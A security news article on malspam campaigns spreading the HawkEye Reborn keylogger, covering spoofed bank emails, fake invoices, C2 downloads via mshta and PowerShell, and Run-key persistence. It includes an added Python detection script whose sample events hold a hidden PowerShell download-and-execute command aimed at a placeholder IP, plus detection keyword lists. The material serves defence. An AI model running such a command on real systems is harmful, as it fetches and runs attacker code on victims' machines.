Malspam Campaigns Use HawkEye Keylogger to Target Business Users - Cybers Guards

[Figure: HawkEye campaigns in April and May]

The malspam campaigns that distribute the keylogger actively target business users in order to steal account credentials and sensitive data, which can then be used as part of account takeover or business email compromise (BEC) attacks. In April and May, spam emails sent by the attackers from spam servers in Estonia were disguised as messages from a Spanish bank or from legitimate companies, distributing both HawkEye Reborn v8.0 and HawkEye Reborn v9.0.

"HawkEye is designed to steal information from infected devices, but it can also be used as a loader, leveraging its network," IBM X-Force's analysis notes. During April and May, a malicious campaign was launched to target business users with malicious spam emails aimed at organizations in numerous sectors, such as transport and logistics, healthcare, import and export, marketing, agriculture, and more.

While the spam emails used generic greetings, featured poorly written text and content, and did not carry any company logo, "the spammers succeeded in spoofing the address they had sent from as the domain of a major bank." The spam emails come with attachments containing fake commercial invoices that drop the HawkEye malware in the background when the victim opens them.

[Figure: Sample malspam email]

The IBM X-Force analysis explains that "samples we checked reached users in Spain, the US and the United Arab Emirates for HawkEye Reborn v.9." The IBM X-Force researchers also saw that "the second line in the script shows a file called AAHEP.txt. An mshta.exe binary launched by PhotoViewer when the victim tries to open the fake invoice will use PowerShell to connect to the command-and-control (C2) server and drop additional malware payloads to infect the victim with the keylogger/stealer malware. This file contains all the necessary instructions regarding the actual HawkEye keylogger usage and command line." The malware gains persistence on the compromised system by using an AutoIt script in the form of an executable named gvg.exe that adds itself to the Windows Registry as an AutoRun entry, ensuring that it is automatically relaunched after each system restart.
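The infection chain just described (mshta.exe handing off to PowerShell for the C2 download, then an AutoIt-built executable registering itself under a Run key) is the kind of behaviour an endpoint telemetry rule can catch without knowing a single file hash. The following is an added example, not code from IBM X-Force, Cisco Talos or the original article: it runs three generic detections over a handful of constructed Sysmon-style events. The event shapes and field names, the user name, the invoice.hta and gvg.exe paths and the 198.51.100.23 C2 address are all assumptions made for illustration and do not come from the analyzed samples. The checks (suspicious parent/child pairs, download-cradle keywords, Run-key values pointing into user-writable directories) apply to this malware family in general rather than only to the April and May campaigns.

```python
"""Added example: spot the mshta -> PowerShell -> Run-key chain the article
describes, using constructed Sysmon-style events (not real telemetry)."""
import ipaddress
import ntpath
import re

# Registry paths that give a binary a foothold at every logon.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Locations a low-privilege user can write to; a Run value pointing here
# is far more suspicious than one under Program Files.
USER_WRITABLE_RE = re.compile(
    r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "-encodedcommand", "frombase64string")
# Only RFC 1918, loopback and link-local count as internal here, so the
# documentation address used below for the constructed C2 reads as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def exe_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def is_external(addr):
    """True if addr parses as an IP address outside INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def detect(events):
    """Return a list of {"rule", "event"} alerts for suspicious events.

    Event IDs follow Sysmon conventions: 1 = process create, 3 = network
    connection, 13 = registry value set. Field names are assumptions.
    """
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            child = exe_name(ev.get("Image", ""))
            parent = exe_name(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "").lower()
            if child in POWERSHELL and parent in SCRIPT_HOSTS:
                alerts.append({"rule": "script_host_spawns_powershell", "event": ev})
            if child in POWERSHELL and any(m in cmd for m in CRADLE_MARKERS):
                alerts.append({"rule": "powershell_download_cradle", "event": ev})
        elif eid == 3:
            if (exe_name(ev.get("Image", "")) in POWERSHELL | SCRIPT_HOSTS
                    and is_external(ev.get("DestinationIp", ""))):
                alerts.append({"rule": "script_host_external_connection", "event": ev})
        elif eid == 13:
            if (RUN_KEY_RE.search(ev.get("TargetObject", ""))
                    and USER_WRITABLE_RE.search(ev.get("Details", ""))):
                alerts.append({"rule": "run_key_persistence_user_writable", "event": ev})
    return alerts


# Constructed sample telemetry mirroring the chain in the article.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\jdoe\AppData\Local\Temp\invoice.hta"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.23/p.txt'))"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Process"},  # benign admin use
    {"EventID": 3, "Image": PS, "DestinationIp": "198.51.100.23", "DestinationPort": 80},
    {"EventID": 3, "Image": PS, "DestinationIp": "10.0.0.5", "DestinationPort": 5985},  # internal WinRM
    {"EventID": 13, "Image": r"C:\Users\jdoe\AppData\Roaming\gvg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\gvg",
     "Details": r"C:\Users\jdoe\AppData\Roaming\gvg.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\updater.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},  # benign vendor entry
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        ev = a["event"]
        print(a["rule"], "->", ev.get("CommandLine") or ev.get("Details") or ev.get("DestinationIp"))
```

The benign events are there on purpose: an administrator running PowerShell from Explorer, PowerShell talking to an internal WinRM host, and a vendor updater under Program Files all pass, while the four malicious events each fire exactly one rule. In a real deployment the Run-key rule would be tuned per environment (some legitimate software does install into AppData), and the download-cradle keyword list would be replaced by proper script-block logging, but the parent/child check on mshta.exe spawning PowerShell is rarely noisy and is worth alerting on as-is.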

This, together with the fact that both campaigns feature very similar attack patterns, with emails dropping malware payloads disguised as commercial invoices to infect targets with an information-stealing Trojan, led X-Force researchers to believe that they are operated by the same threat actor.

[Figure: Infection process of the malspam campaign powered by HawkEye]

In the list of indicators of compromise for the April and May 2019 campaigns, X-Force researchers identified another malspam campaign from a Turkish host "between 11 February 2019 and 3 March 2019," with IP addresses from the same Class C network. During April, Cisco Talos also observed other malspam campaigns distributing the HawkEye keylogger, as did My Online Security during May, with the latter noting that the data was either exfiltrated to the server of another keylogger named Spytector or that the attackers used a compromised Spytector email account to collect the stolen data.

HawkEye is being sold on dark web markets and hacking forums by its development team and is currently being distributed by resellers, after changing owners in December 2018. HawkEye Reborn v9, the latest version of the malware kit, can collect data from various applications and then send it to its operators over protocols such as FTP, HTTP, and SMTP.

[Figure: Email sent by the HawkEye keylogger to its operator]

The HawkEye Reborn v9 malware kit

Since around 2013, the HawkEye keylogger and information-stealer malware kit has been in development, with a multitude of new features and modules added over the years by its developers to boost its monitoring and data-theft capabilities.

[Figure: HawkEye Reborn UI]

"Recent changes in HawkEye Reborn Keylogger/Stealer's ownership and development efforts show that this is a threat that will continue to experience ongoing development and improvement moving forward," Cisco Talos' research team said in its analysis of the HawkEye Reborn v9 keylogger/stealer. "HawkEye has been active across the threat landscape for a long time and is likely to continue to be leveraged in the future as long as the kit's developers can monetize their efforts."
